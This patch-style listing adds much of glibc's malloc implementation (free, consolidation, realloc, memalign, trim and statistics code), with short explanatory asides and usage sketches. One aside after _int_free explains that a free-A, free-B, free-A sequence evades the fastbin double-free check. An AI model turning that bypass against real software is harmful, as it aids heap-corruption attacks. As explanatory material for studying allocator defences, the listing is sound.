+              return p;
+            }
+        }
+
+    use_top:
+      /*
+         If large enough, split off the chunk bordering the end of memory
+         (held in av->top). Note that this is in accord with the best-fit
+         search rule.  In effect, av->top is treated as larger (and thus
+         less well fitting) than any other available chunk since it can
+         be extended to be as large as necessary (up to system
+         limitations).
+
+         We require that av->top always exists (i.e., has size >=
+         MINSIZE) after initialization, so if it would otherwise be
+         exhausted by current request, it is replenished. (The main
+         reason for ensuring it exists is that we may need MINSIZE space
+         to put in fenceposts in sysmalloc.)
+       */
+
+      victim = av->top;
+      size = chunksize (victim);
+
+      if ((unsigned long) (size) >= (unsigned long) (nb + MINSIZE))
+        {
+          remainder_size = size - nb;
+          remainder = chunk_at_offset (victim, nb);
+          av->top = remainder;
+          set_head (victim, nb | PREV_INUSE |
+                    (av != &main_arena ? NON_MAIN_ARENA : 0));
+          set_head (remainder, remainder_size | PREV_INUSE);
+
+          check_malloced_chunk (av, victim, nb);
+          void *p = chunk2mem (victim);
+          alloc_perturb (p, bytes);
+          return p;
+        }
+
+      /* When we are using atomic ops to free fast chunks we can get
+         here for all block sizes.  */
+      else if (have_fastchunks (av))
+        {
+          malloc_consolidate (av);
+          /* restore original bin index */
+          if (in_smallbin_range (nb))
+            idx = smallbin_index (nb);
+          else
+            idx = largebin_index (nb);
+        }
+
+      /*
+         Otherwise, relay to handle system-dependent cases
+       */
+      else
+        {
+          void *p = sysmalloc (nb, av);
+          if (p != NULL)
+            alloc_perturb (p, bytes);
+          return p;
+        }
+    }
+}
+
+/*
+   ------------------------------ free ------------------------------
+ */
+
+static void
+_int_free (mstate av, mchunkptr p, int have_lock)
+{
+  INTERNAL_SIZE_T size;        /* its size */
+  mfastbinptr *fb;             /* associated fastbin */
+  mchunkptr nextchunk;         /* next contiguous chunk */
+  INTERNAL_SIZE_T nextsize;    /* its size */
+  int nextinuse;               /* true if nextchunk is used */
+  INTERNAL_SIZE_T prevsize;    /* size of previous contiguous chunk */
+  mchunkptr bck;               /* misc temp for linking */
+  mchunkptr fwd;               /* misc temp for linking */
+
+  const char *errstr = NULL;
+  int locked = 0;
+
+  size = chunksize (p);
+
+  /* Little security check which won't hurt performance: the
+     allocator never wraps around at the end of the address space.
+     Therefore we can exclude some size values which might appear
+     here by accident or by "design" from some intruder.  */
+  if (__builtin_expect ((uintptr_t) p > (uintptr_t) -size, 0)
+      || __builtin_expect (misaligned_chunk (p), 0))
+    {
+      errstr = "free(): invalid pointer";
+    errout:
+      if (!have_lock && locked)
+        __libc_lock_unlock (av->mutex);
+      malloc_printerr (check_action, errstr, chunk2mem (p), av);
+      return;
+    }
+  /* We know that each chunk is at least MINSIZE bytes in size and a
+     multiple of MALLOC_ALIGNMENT.  */
+  if (__glibc_unlikely (size < MINSIZE || !aligned_OK (size)))
+    {
+      errstr = "free(): invalid size";
+      goto errout;
+    }
+
+  check_inuse_chunk(av, p);
+
+  /*
+    If eligible, place chunk on a fastbin so it can be found
+    and used quickly in malloc.
+  */
+
+  if ((unsigned long)(size) <= (unsigned long)(get_max_fast ())
+
+#if TRIM_FASTBINS
+      /*
+	If TRIM_FASTBINS set, don't place chunks
+	bordering top into fastbins
+      */
+      && (chunk_at_offset(p, size) != av->top)
+#endif
+      ) {
+
+    if (__builtin_expect (chunksize_nomask (chunk_at_offset (p, size))
+			  <= 2 * SIZE_SZ, 0)
+	|| __builtin_expect (chunksize (chunk_at_offset (p, size))
+			     >= av->system_mem, 0))
+      {
+	/* We might not have a lock at this point and concurrent modifications
+           of system_mem might have led to a false positive.  Redo the test
+	   after getting the lock.  */
+	if (have_lock
+	    || ({ assert (locked == 0);
+		  __libc_lock_lock (av->mutex);
+		  locked = 1;
+		  chunksize_nomask (chunk_at_offset (p, size)) <= 2 * SIZE_SZ
+		    || chunksize (chunk_at_offset (p, size)) >= av->system_mem;
+	      }))
+	  {
+	    errstr = "free(): invalid next size (fast)";
+	    goto errout;
+	  }
+	if (! have_lock)
+	  {
+	    __libc_lock_unlock (av->mutex);
+	    locked = 0;
+	  }
+      }
+
+    free_perturb (chunk2mem(p), size - 2 * SIZE_SZ);
+
+    set_fastchunks(av);
+    unsigned int idx = fastbin_index(size);
+    fb = &fastbin (av, idx);
+
+    /* Atomically link P to its fastbin: P->FD = *FB; *FB = P;  */
+    mchunkptr old = *fb, old2;
+    unsigned int old_idx = ~0u;
+    do
+      {
+	/* Check that the top of the bin is not the record we are going to add
+	   (i.e., double free).  */
+	if (__builtin_expect (old == p, 0))
+	  {
+	    errstr = "double free or corruption (fasttop)";
+	    goto errout;
+	  }
+	/* Check that size of fastbin chunk at the top is the same as
+	   size of the chunk that we are adding.  We can dereference OLD
+	   only if we have the lock, otherwise it might have already been
+	   deallocated.  See use of OLD_IDX below for the actual check.  */
+	if (have_lock && old != NULL)
+	  old_idx = fastbin_index(chunksize(old));
+	p->fd = old2 = old;
+      }
+    while ((old = catomic_compare_and_exchange_val_rel (fb, p, old2)) != old2);
+
+    if (have_lock && old != NULL && __builtin_expect (old_idx != idx, 0))
+      {
+	errstr = "invalid fastbin entry (free)";
+	goto errout;
+      }
+  }
+
+  /*
+    Consolidate other non-mmapped chunks as they arrive.
+  */
+
+  else if (!chunk_is_mmapped(p)) {
+    if (! have_lock) {
+      __libc_lock_lock (av->mutex);
+      locked = 1;
+    }
+
+    nextchunk = chunk_at_offset(p, size);
+
+    /* Lightweight tests: check whether the block is already the
+       top block.  */
+    if (__glibc_unlikely (p == av->top))
+      {
+	errstr = "double free or corruption (top)";
+	goto errout;
+      }
+    /* Or whether the next chunk is beyond the boundaries of the arena.  */
+    if (__builtin_expect (contiguous (av)
+			  && (char *) nextchunk
+			  >= ((char *) av->top + chunksize(av->top)), 0))
+      {
+	errstr = "double free or corruption (out)";
+	goto errout;
+      }
+    /* Or whether the block is actually not marked used.  */
+    if (__glibc_unlikely (!prev_inuse(nextchunk)))
+      {
+	errstr = "double free or corruption (!prev)";
+	goto errout;
+      }
+
+    nextsize = chunksize(nextchunk);
+    if (__builtin_expect (chunksize_nomask (nextchunk) <= 2 * SIZE_SZ, 0)
+	|| __builtin_expect (nextsize >= av->system_mem, 0))
+      {
+	errstr = "free(): invalid next size (normal)";
+	goto errout;
+      }
+
+    free_perturb (chunk2mem(p), size - 2 * SIZE_SZ);
+
+    /* consolidate backward */
+    if (!prev_inuse(p)) {
+      prevsize = prev_size (p);
+      size += prevsize;
+      p = chunk_at_offset(p, -((long) prevsize));
+      unlink(av, p, bck, fwd);
+    }
+
+    if (nextchunk != av->top) {
+      /* get and clear inuse bit */
+      nextinuse = inuse_bit_at_offset(nextchunk, nextsize);
+
+      /* consolidate forward */
+      if (!nextinuse) {
+	unlink(av, nextchunk, bck, fwd);
+	size += nextsize;
+      } else
+	clear_inuse_bit_at_offset(nextchunk, 0);
+
+      /*
+	Place the chunk in unsorted chunk list. Chunks are
+	not placed into regular bins until after they have
+	been given one chance to be used in malloc.
+      */
+
+      bck = unsorted_chunks(av);
+      fwd = bck->fd;
+      if (__glibc_unlikely (fwd->bk != bck))
+	{
+	  errstr = "free(): corrupted unsorted chunks";
+	  goto errout;
+	}
+      p->fd = fwd;
+      p->bk = bck;
+      if (!in_smallbin_range(size))
+	{
+	  p->fd_nextsize = NULL;
+	  p->bk_nextsize = NULL;
+	}
+      bck->fd = p;
+      fwd->bk = p;
+
+      set_head(p, size | PREV_INUSE);
+      set_foot(p, size);
+
+      check_free_chunk(av, p);
+    }
+
+    /*
+      If the chunk borders the current high end of memory,
+      consolidate into top
+    */
+
+    else {
+      size += nextsize;
+      set_head(p, size | PREV_INUSE);
+      av->top = p;
+      check_chunk(av, p);
+    }
+
+    /*
+      If freeing a large space, consolidate possibly-surrounding
+      chunks. Then, if the total unused topmost memory exceeds trim
+      threshold, ask malloc_trim to reduce top.
+
+      Unless max_fast is 0, we don't know if there are fastbins
+      bordering top, so we cannot tell for sure whether threshold
+      has been reached unless fastbins are consolidated.  But we
+      don't want to consolidate on each free.  As a compromise,
+      consolidation is performed if FASTBIN_CONSOLIDATION_THRESHOLD
+      is reached.
+    */
+
+    if ((unsigned long)(size) >= FASTBIN_CONSOLIDATION_THRESHOLD) {
+      if (have_fastchunks(av))
+	malloc_consolidate(av);
+
+      if (av == &main_arena) {
+#ifndef MORECORE_CANNOT_TRIM
+	if ((unsigned long)(chunksize(av->top)) >=
+	    (unsigned long)(mp_.trim_threshold))
+	  systrim(mp_.top_pad, av);
+#endif
+      } else {
+	/* Always try heap_trim(), even if the top chunk is not
+	   large, because the corresponding heap might go away.  */
+	heap_info *heap = heap_for_ptr(top(av));
+
+	assert(heap->ar_ptr == av);
+	heap_trim(heap, mp_.top_pad);
+      }
+    }
+
+    if (! have_lock) {
+      assert (locked);
+      __libc_lock_unlock (av->mutex);
+    }
+  }
+  /*
+    If the chunk was allocated via mmap, release via munmap().
+  */
+
+  else {
+    munmap_chunk (p);
+  }
+}
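
The fasttop test above only compares the chunk being freed with the current head of its fastbin, so it catches an immediate double free but not a free-A, free-B, free-A pattern. A minimal sketch of the detected case, assuming a build without tcache such as this one (the abort message is the errstr set above):

    #include <stdlib.h>

    int main(void)
    {
        char *a = malloc(24);   /* fastbin-sized on typical builds */
        free(a);                /* a becomes the fastbin top */
        free(a);                /* old == p, so glibc reports
                                   "double free or corruption (fasttop)" */
        return 0;
    }

Interleaving a free of a different chunk of the same size between the two frees would slip past this particular check; only the immediate repeat is caught here.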
+
+/*
+  ------------------------- malloc_consolidate -------------------------
+
+  malloc_consolidate is a specialized version of free() that tears
+  down chunks held in fastbins.  Free itself cannot be used for this
+  purpose since, among other things, it might place chunks back onto
+  fastbins.  So, instead, we need to use a minor variant of the same
+  code.
+
+  Also, because this routine needs to be called the first time through
+  malloc anyway, it turns out to be the perfect place to trigger
+  initialization code.
+*/
+
+static void malloc_consolidate(mstate av)
+{
+  mfastbinptr*    fb;                 /* current fastbin being consolidated */
+  mfastbinptr*    maxfb;              /* last fastbin (for loop control) */
+  mchunkptr       p;                  /* current chunk being consolidated */
+  mchunkptr       nextp;              /* next chunk to consolidate */
+  mchunkptr       unsorted_bin;       /* bin header */
+  mchunkptr       first_unsorted;     /* chunk to link to */
+
+  /* These have same use as in free() */
+  mchunkptr       nextchunk;
+  INTERNAL_SIZE_T size;
+  INTERNAL_SIZE_T nextsize;
+  INTERNAL_SIZE_T prevsize;
+  int             nextinuse;
+  mchunkptr       bck;
+  mchunkptr       fwd;
+
+  /*
+    If max_fast is 0, we know that av hasn't
+    yet been initialized, in which case do so below
+  */
+
+  if (get_max_fast () != 0) {
+    clear_fastchunks(av);
+
+    unsorted_bin = unsorted_chunks(av);
+
+    /*
+      Remove each chunk from fast bin and consolidate it, placing it
+      then in unsorted bin. Among other reasons for doing this,
+      placing in unsorted bin avoids needing to calculate actual bins
+      until malloc is sure that chunks aren't immediately going to be
+      reused anyway.
+    */
+
+    maxfb = &fastbin (av, NFASTBINS - 1);
+    fb = &fastbin (av, 0);
+    do {
+      p = atomic_exchange_acq (fb, NULL);
+      if (p != 0) {
+	do {
+	  check_inuse_chunk(av, p);
+	  nextp = p->fd;
+
+	  /* Slightly streamlined version of consolidation code in free() */
+	  size = chunksize (p);
+	  nextchunk = chunk_at_offset(p, size);
+	  nextsize = chunksize(nextchunk);
+
+	  if (!prev_inuse(p)) {
+	    prevsize = prev_size (p);
+	    size += prevsize;
+	    p = chunk_at_offset(p, -((long) prevsize));
+	    unlink(av, p, bck, fwd);
+	  }
+
+	  if (nextchunk != av->top) {
+	    nextinuse = inuse_bit_at_offset(nextchunk, nextsize);
+
+	    if (!nextinuse) {
+	      size += nextsize;
+	      unlink(av, nextchunk, bck, fwd);
+	    } else
+	      clear_inuse_bit_at_offset(nextchunk, 0);
+
+	    first_unsorted = unsorted_bin->fd;
+	    unsorted_bin->fd = p;
+	    first_unsorted->bk = p;
+
+	    if (!in_smallbin_range (size)) {
+	      p->fd_nextsize = NULL;
+	      p->bk_nextsize = NULL;
+	    }
+
+	    set_head(p, size | PREV_INUSE);
+	    p->bk = unsorted_bin;
+	    p->fd = first_unsorted;
+	    set_foot(p, size);
+	  }
+
+	  else {
+	    size += nextsize;
+	    set_head(p, size | PREV_INUSE);
+	    av->top = p;
+	  }
+
+	} while ( (p = nextp) != 0);
+
+      }
+    } while (fb++ != maxfb);
+  }
+  else {
+    malloc_init_state(av);
+    check_malloc_state(av);
+  }
+}
+
+/*
+  ------------------------------ realloc ------------------------------
+*/
+
+void*
+_int_realloc(mstate av, mchunkptr oldp, INTERNAL_SIZE_T oldsize,
+	     INTERNAL_SIZE_T nb)
+{
+  mchunkptr        newp;            /* chunk to return */
+  INTERNAL_SIZE_T  newsize;         /* its size */
+  void*          newmem;          /* corresponding user mem */
+
+  mchunkptr        next;            /* next contiguous chunk after oldp */
+
+  mchunkptr        remainder;       /* extra space at end of newp */
+  unsigned long    remainder_size;  /* its size */
+
+  mchunkptr        bck;             /* misc temp for linking */
+  mchunkptr        fwd;             /* misc temp for linking */
+
+  unsigned long    copysize;        /* bytes to copy */
+  unsigned int     ncopies;         /* INTERNAL_SIZE_T words to copy */
+  INTERNAL_SIZE_T* s;               /* copy source */
+  INTERNAL_SIZE_T* d;               /* copy destination */
+
+  const char *errstr = NULL;
+
+  /* oldmem size */
+  if (__builtin_expect (chunksize_nomask (oldp) <= 2 * SIZE_SZ, 0)
+      || __builtin_expect (oldsize >= av->system_mem, 0))
+    {
+      errstr = "realloc(): invalid old size";
+    errout:
+      malloc_printerr (check_action, errstr, chunk2mem (oldp), av);
+      return NULL;
+    }
+
+  check_inuse_chunk (av, oldp);
+
+  /* All callers already filter out mmap'ed chunks.  */
+  assert (!chunk_is_mmapped (oldp));
+
+  next = chunk_at_offset (oldp, oldsize);
+  INTERNAL_SIZE_T nextsize = chunksize (next);
+  if (__builtin_expect (chunksize_nomask (next) <= 2 * SIZE_SZ, 0)
+      || __builtin_expect (nextsize >= av->system_mem, 0))
+    {
+      errstr = "realloc(): invalid next size";
+      goto errout;
+    }
+
+  if ((unsigned long) (oldsize) >= (unsigned long) (nb))
+    {
+      /* already big enough; split below */
+      newp = oldp;
+      newsize = oldsize;
+    }
+
+  else
+    {
+      /* Try to expand forward into top */
+      if (next == av->top &&
+          (unsigned long) (newsize = oldsize + nextsize) >=
+          (unsigned long) (nb + MINSIZE))
+        {
+          set_head_size (oldp, nb | (av != &main_arena ? NON_MAIN_ARENA : 0));
+          av->top = chunk_at_offset (oldp, nb);
+          set_head (av->top, (newsize - nb) | PREV_INUSE);
+          check_inuse_chunk (av, oldp);
+          return chunk2mem (oldp);
+        }
+
+      /* Try to expand forward into next chunk;  split off remainder below */
+      else if (next != av->top &&
+               !inuse (next) &&
+               (unsigned long) (newsize = oldsize + nextsize) >=
+               (unsigned long) (nb))
+        {
+          newp = oldp;
+          unlink (av, next, bck, fwd);
+        }
+
+      /* allocate, copy, free */
+      else
+        {
+          newmem = _int_malloc (av, nb - MALLOC_ALIGN_MASK);
+          if (newmem == 0)
+            return 0; /* propagate failure */
+
+          newp = mem2chunk (newmem);
+          newsize = chunksize (newp);
+
+          /*
+             Avoid copy if newp is next chunk after oldp.
+           */
+          if (newp == next)
+            {
+              newsize += oldsize;
+              newp = oldp;
+            }
+          else
+            {
+              /*
+                 Unroll copy of <= 36 bytes (72 if 8-byte sizes)
+                 We know that contents have an odd number of
+                 INTERNAL_SIZE_T-sized words; minimally 3.
+               */
+
+              copysize = oldsize - SIZE_SZ;
+              s = (INTERNAL_SIZE_T *) (chunk2mem (oldp));
+              d = (INTERNAL_SIZE_T *) (newmem);
+              ncopies = copysize / sizeof (INTERNAL_SIZE_T);
+              assert (ncopies >= 3);
+
+              if (ncopies > 9)
+                memcpy (d, s, copysize);
+
+              else
+                {
+                  *(d + 0) = *(s + 0);
+                  *(d + 1) = *(s + 1);
+                  *(d + 2) = *(s + 2);
+                  if (ncopies > 4)
+                    {
+                      *(d + 3) = *(s + 3);
+                      *(d + 4) = *(s + 4);
+                      if (ncopies > 6)
+                        {
+                          *(d + 5) = *(s + 5);
+                          *(d + 6) = *(s + 6);
+                          if (ncopies > 8)
+                            {
+                              *(d + 7) = *(s + 7);
+                              *(d + 8) = *(s + 8);
+                            }
+                        }
+                    }
+                }
+
+              _int_free (av, oldp, 1);
+              check_inuse_chunk (av, newp);
+              return chunk2mem (newp);
+            }
+        }
+    }
+
+  /* If possible, free extra space in old or extended chunk */
+
+  assert ((unsigned long) (newsize) >= (unsigned long) (nb));
+
+  remainder_size = newsize - nb;
+
+  if (remainder_size < MINSIZE)   /* not enough extra to split off */
+    {
+      set_head_size (newp, newsize | (av != &main_arena ? NON_MAIN_ARENA : 0));
+      set_inuse_bit_at_offset (newp, newsize);
+    }
+  else   /* split remainder */
+    {
+      remainder = chunk_at_offset (newp, nb);
+      set_head_size (newp, nb | (av != &main_arena ? NON_MAIN_ARENA : 0));
+      set_head (remainder, remainder_size | PREV_INUSE |
+                (av != &main_arena ? NON_MAIN_ARENA : 0));
+      /* Mark remainder as inuse so free() won't complain */
+      set_inuse_bit_at_offset (remainder, remainder_size);
+      _int_free (av, remainder, 1);
+    }
+
+  check_inuse_chunk (av, newp);
+  return chunk2mem (newp);
+}
+
+/*
+   ------------------------------ memalign ------------------------------
+ */
+
+static void *
+_int_memalign (mstate av, size_t alignment, size_t bytes)
+{
+  INTERNAL_SIZE_T nb;             /* padded  request size */
+  char *m;                        /* memory returned by malloc call */
+  mchunkptr p;                    /* corresponding chunk */
+  char *brk;                      /* alignment point within p */
+  mchunkptr newp;                 /* chunk to return */
+  INTERNAL_SIZE_T newsize;        /* its size */
+  INTERNAL_SIZE_T leadsize;       /* leading space before alignment point */
+  mchunkptr remainder;            /* spare room at end to split off */
+  unsigned long remainder_size;   /* its size */
+  INTERNAL_SIZE_T size;
+
+
+
+  checked_request2size (bytes, nb);
+
+  /*
+     Strategy: find a spot within that chunk that meets the alignment
+     request, and then possibly free the leading and trailing space.
+   */
+
+
+  /* Call malloc with worst case padding to hit alignment. */
+
+  m = (char *) (_int_malloc (av, nb + alignment + MINSIZE));
+
+  if (m == 0)
+    return 0;           /* propagate failure */
+
+  p = mem2chunk (m);
+
+  if ((((unsigned long) (m)) % alignment) != 0)   /* misaligned */
+
+    {
+      /* Find an aligned spot inside chunk.  Since we need to give back
+         leading space in a chunk of at least MINSIZE, if the first
+         calculation places us at a spot with less than MINSIZE leader,
+         we can move to the next aligned spot -- we've allocated enough
+         total room so that this is always possible.  */
+      brk = (char *) mem2chunk (((unsigned long) (m + alignment - 1)) &
+                                - ((signed long) alignment));
+      if ((unsigned long) (brk - (char *) (p)) < MINSIZE)
+        brk += alignment;
+
+      newp = (mchunkptr) brk;
+      leadsize = brk - (char *) (p);
+      newsize = chunksize (p) - leadsize;
+
+      /* For mmapped chunks, just adjust offset */
+      if (chunk_is_mmapped (p))
+        {
+          set_prev_size (newp, prev_size (p) + leadsize);
+          set_head (newp, newsize | IS_MMAPPED);
+          return chunk2mem (newp);
+        }
+
+      /* Otherwise, give back leader, use the rest */
+      set_head (newp, newsize | PREV_INUSE |
+                (av != &main_arena ? NON_MAIN_ARENA : 0));
+      set_inuse_bit_at_offset (newp, newsize);
+      set_head_size (p, leadsize | (av != &main_arena ? NON_MAIN_ARENA : 0));
+      _int_free (av, p, 1);
+      p = newp;
+
+      assert (newsize >= nb &&
+              (((unsigned long) (chunk2mem (p))) % alignment) == 0);
+    }
+
+  /* Also give back spare room at the end */
+  if (!chunk_is_mmapped (p))
+    {
+      size = chunksize (p);
+      if ((unsigned long) (size) > (unsigned long) (nb + MINSIZE))
+        {
+          remainder_size = size - nb;
+          remainder = chunk_at_offset (p, nb);
+          set_head (remainder, remainder_size | PREV_INUSE |
+                    (av != &main_arena ? NON_MAIN_ARENA : 0));
+          set_head_size (p, nb);
+          _int_free (av, remainder, 1);
+        }
+    }
+
+  check_inuse_chunk (av, p);
+  return chunk2mem (p);
+}
+
+
+/*
+   ------------------------------ malloc_trim ------------------------------
+ */
+
+static int
+mtrim (mstate av, size_t pad)
+{
+  /* Don't touch corrupt arenas.  */
+  if (arena_is_corrupt (av))
+    return 0;
+
+  /* Ensure initialization/consolidation */
+  malloc_consolidate (av);
+
+  const size_t ps = GLRO (dl_pagesize);
+  int psindex = bin_index (ps);
+  const size_t psm1 = ps - 1;
+
+  int result = 0;
+  for (int i = 1; i < NBINS; ++i)
+    if (i == 1 || i >= psindex)
+      {
+        mbinptr bin = bin_at (av, i);
+
+        for (mchunkptr p = last (bin); p != bin; p = p->bk)
+          {
+            INTERNAL_SIZE_T size = chunksize (p);
+
+            if (size > psm1 + sizeof (struct malloc_chunk))
+              {
+                /* See whether the chunk contains at least one unused page.  */
+                char *paligned_mem = (char *) (((uintptr_t) p
+                                                + sizeof (struct malloc_chunk)
+                                                + psm1) & ~psm1);
+
+                assert ((char *) chunk2mem (p) + 4 * SIZE_SZ <= paligned_mem);
+                assert ((char *) p + size > paligned_mem);
+
+                /* This is the size we could potentially free.  */
+                size -= paligned_mem - (char *) p;
+
+                if (size > psm1)
+                  {
+#if MALLOC_DEBUG
+                    /* When debugging we simulate destroying the memory
+                       content.  */
+                    memset (paligned_mem, 0x89, size & ~psm1);
+#endif
+                    __madvise (paligned_mem, size & ~psm1, MADV_DONTNEED);
+
+                    result = 1;
+                  }
+              }
+          }
+      }
+
+#ifndef MORECORE_CANNOT_TRIM
+  return result | (av == &main_arena ? systrim (pad, av) : 0);
+
+#else
+  return result;
+#endif
+}
+
+
+int
+__malloc_trim (size_t s)
+{
+  int result = 0;
+
+  if (__malloc_initialized < 0)
+    ptmalloc_init ();
+
+  mstate ar_ptr = &main_arena;
+  do
+    {
+      __libc_lock_lock (ar_ptr->mutex);
+      result |= mtrim (ar_ptr, s);
+      __libc_lock_unlock (ar_ptr->mutex);
+
+      ar_ptr = ar_ptr->next;
+    }
+  while (ar_ptr != &main_arena);
+
+  return result;
+}
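
The weak alias at the end of the file exports this as malloc_trim(); a minimal usage sketch (whether anything is actually released depends on heap state, so the return value is only a hint):

    #include <malloc.h>
    #include <stdio.h>
    #include <stdlib.h>

    int main(void)
    {
        void *p = malloc(1 << 20);
        free(p);

        /* Walk every arena, madvise() whole free pages away and, for the
           main arena, try to shrink the top via systrim(); returns 1 if
           any memory was given back. */
        int released = malloc_trim(0);
        printf("malloc_trim(0) -> %d\n", released);
        return 0;
    }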
+
+
+/*
+   ------------------------- malloc_usable_size -------------------------
+ */
+
+static size_t
+musable (void *mem)
+{
+  mchunkptr p;
+  if (mem != 0)
+    {
+      p = mem2chunk (mem);
+
+      if (__builtin_expect (using_malloc_checking == 1, 0))
+        return malloc_check_get_size (p);
+
+      if (chunk_is_mmapped (p))
+	{
+	  if (DUMPED_MAIN_ARENA_CHUNK (p))
+	    return chunksize (p) - SIZE_SZ;
+	  else
+	    return chunksize (p) - 2 * SIZE_SZ;
+	}
+      else if (inuse (p))
+        return chunksize (p) - SIZE_SZ;
+    }
+  return 0;
+}
+
+
+size_t
+__malloc_usable_size (void *m)
+{
+  size_t result;
+
+  result = musable (m);
+  return result;
+}
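
A short usage sketch of the exported malloc_usable_size() wrapper; the value it reports follows musable() above, so it depends on word size and on whether the chunk is mmapped:

    #include <malloc.h>
    #include <stdio.h>
    #include <stdlib.h>

    int main(void)
    {
        char *p = malloc(10);

        /* For an in-use, non-mmapped chunk this is chunksize - SIZE_SZ,
           typically 24 for this request on a 64-bit build. */
        printf("requested 10, usable %zu\n", malloc_usable_size(p));

        free(p);
        return 0;
    }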
+
+/*
+   ------------------------------ mallinfo ------------------------------
+   Accumulate malloc statistics for arena AV into M.
+ */
+
+static void
+int_mallinfo (mstate av, struct mallinfo *m)
+{
+  size_t i;
+  mbinptr b;
+  mchunkptr p;
+  INTERNAL_SIZE_T avail;
+  INTERNAL_SIZE_T fastavail;
+  int nblocks;
+  int nfastblocks;
+
+  /* Ensure initialization */
+  if (av->top == 0)
+    malloc_consolidate (av);
+
+  check_malloc_state (av);
+
+  /* Account for top */
+  avail = chunksize (av->top);
+  nblocks = 1;  /* top always exists */
+
+  /* traverse fastbins */
+  nfastblocks = 0;
+  fastavail = 0;
+
+  for (i = 0; i < NFASTBINS; ++i)
+    {
+      for (p = fastbin (av, i); p != 0; p = p->fd)
+        {
+          ++nfastblocks;
+          fastavail += chunksize (p);
+        }
+    }
+
+  avail += fastavail;
+
+  /* traverse regular bins */
+  for (i = 1; i < NBINS; ++i)
+    {
+      b = bin_at (av, i);
+      for (p = last (b); p != b; p = p->bk)
+        {
+          ++nblocks;
+          avail += chunksize (p);
+        }
+    }
+
+  m->smblks += nfastblocks;
+  m->ordblks += nblocks;
+  m->fordblks += avail;
+  m->uordblks += av->system_mem - avail;
+  m->arena += av->system_mem;
+  m->fsmblks += fastavail;
+  if (av == &main_arena)
+    {
+      m->hblks = mp_.n_mmaps;
+      m->hblkhd = mp_.mmapped_mem;
+      m->usmblks = 0;
+      m->keepcost = chunksize (av->top);
+    }
+}
+
+
+struct mallinfo
+__libc_mallinfo (void)
+{
+  struct mallinfo m;
+  mstate ar_ptr;
+
+  if (__malloc_initialized < 0)
+    ptmalloc_init ();
+
+  memset (&m, 0, sizeof (m));
+  ar_ptr = &main_arena;
+  do
+    {
+      __libc_lock_lock (ar_ptr->mutex);
+      int_mallinfo (ar_ptr, &m);
+      __libc_lock_unlock (ar_ptr->mutex);
+
+      ar_ptr = ar_ptr->next;
+    }
+  while (ar_ptr != &main_arena);
+
+  return m;
+}
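
The exported mallinfo() sums these per-arena counters over every arena; a usage sketch (the classic struct uses int fields, so the numbers can wrap on very large heaps, and the related malloc_stats() below prints a similar summary to stderr):

    #include <malloc.h>
    #include <stdio.h>
    #include <stdlib.h>

    int main(void)
    {
        void *p = malloc(1000);
        struct mallinfo mi = mallinfo();

        printf("arena    (bytes obtained from the system) = %d\n", mi.arena);
        printf("uordblks (bytes in use)                   = %d\n", mi.uordblks);
        printf("fordblks (free bytes in bins and top)     = %d\n", mi.fordblks);
        printf("keepcost (releasable top chunk size)      = %d\n", mi.keepcost);

        free(p);
        return 0;
    }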
+
+/*
+   ------------------------------ malloc_stats ------------------------------
+ */
+
+void
+__malloc_stats (void)
+{
+  int i;
+  mstate ar_ptr;
+  unsigned int in_use_b = mp_.mmapped_mem, system_b = in_use_b;
+
+  if (__malloc_initialized < 0)
+    ptmalloc_init ();
+  _IO_flockfile (stderr);
+  int old_flags2 = ((_IO_FILE *) stderr)->_flags2;
+  ((_IO_FILE *) stderr)->_flags2 |= _IO_FLAGS2_NOTCANCEL;
+  for (i = 0, ar_ptr = &main_arena;; i++)
+    {
+      struct mallinfo mi;
+
+      memset (&mi, 0, sizeof (mi));
+      __libc_lock_lock (ar_ptr->mutex);
+      int_mallinfo (ar_ptr, &mi);
+      fprintf (stderr, "Arena %d:\n", i);
+      fprintf (stderr, "system bytes     = %10u\n", (unsigned int) mi.arena);
+      fprintf (stderr, "in use bytes     = %10u\n", (unsigned int) mi.uordblks);
+#if MALLOC_DEBUG > 1
+      if (i > 0)
+        dump_heap (heap_for_ptr (top (ar_ptr)));
+#endif
+      system_b += mi.arena;
+      in_use_b += mi.uordblks;
+      __libc_lock_unlock (ar_ptr->mutex);
+      ar_ptr = ar_ptr->next;
+      if (ar_ptr == &main_arena)
+        break;
+    }
+  fprintf (stderr, "Total (incl. mmap):\n");
+  fprintf (stderr, "system bytes     = %10u\n", system_b);
+  fprintf (stderr, "in use bytes     = %10u\n", in_use_b);
+  fprintf (stderr, "max mmap regions = %10u\n", (unsigned int) mp_.max_n_mmaps);
+  fprintf (stderr, "max mmap bytes   = %10lu\n",
+           (unsigned long) mp_.max_mmapped_mem);
+  ((_IO_FILE *) stderr)->_flags2 |= old_flags2;
+  _IO_funlockfile (stderr);
+}
+
+
+/*
+   ------------------------------ mallopt ------------------------------
+ */
+static inline int
+__always_inline
+do_set_trim_threshold (size_t value)
+{
+  LIBC_PROBE (memory_mallopt_trim_threshold, 3, value, mp_.trim_threshold,
+	      mp_.no_dyn_threshold);
+  mp_.trim_threshold = value;
+  mp_.no_dyn_threshold = 1;
+  return 1;
+}
+
+static inline int
+__always_inline
+do_set_top_pad (size_t value)
+{
+  LIBC_PROBE (memory_mallopt_top_pad, 3, value, mp_.top_pad,
+	      mp_.no_dyn_threshold);
+  mp_.top_pad = value;
+  mp_.no_dyn_threshold = 1;
+  return 1;
+}
+
+static inline int
+__always_inline
+do_set_mmap_threshold (size_t value)
+{
+  /* Forbid setting the threshold too high.  */
+  if (value <= HEAP_MAX_SIZE / 2)
+    {
+      LIBC_PROBE (memory_mallopt_mmap_threshold, 3, value, mp_.mmap_threshold,
+		  mp_.no_dyn_threshold);
+      mp_.mmap_threshold = value;
+      mp_.no_dyn_threshold = 1;
+      return 1;
+    }
+  return 0;
+}
+
+static inline int
+__always_inline
+do_set_mmaps_max (int32_t value)
+{
+  LIBC_PROBE (memory_mallopt_mmap_max, 3, value, mp_.n_mmaps_max,
+	      mp_.no_dyn_threshold);
+  mp_.n_mmaps_max = value;
+  mp_.no_dyn_threshold = 1;
+  return 1;
+}
+
+static inline int
+__always_inline
+do_set_mallopt_check (int32_t value)
+{
+  LIBC_PROBE (memory_mallopt_check_action, 2, value, check_action);
+  check_action = value;
+  return 1;
+}
+
+static inline int
+__always_inline
+do_set_perturb_byte (int32_t value)
+{
+  LIBC_PROBE (memory_mallopt_perturb, 2, value, perturb_byte);
+  perturb_byte = value;
+  return 1;
+}
+
+static inline int
+__always_inline
+do_set_arena_test (size_t value)
+{
+  LIBC_PROBE (memory_mallopt_arena_test, 2, value, mp_.arena_test);
+  mp_.arena_test = value;
+  return 1;
+}
+
+static inline int
+__always_inline
+do_set_arena_max (size_t value)
+{
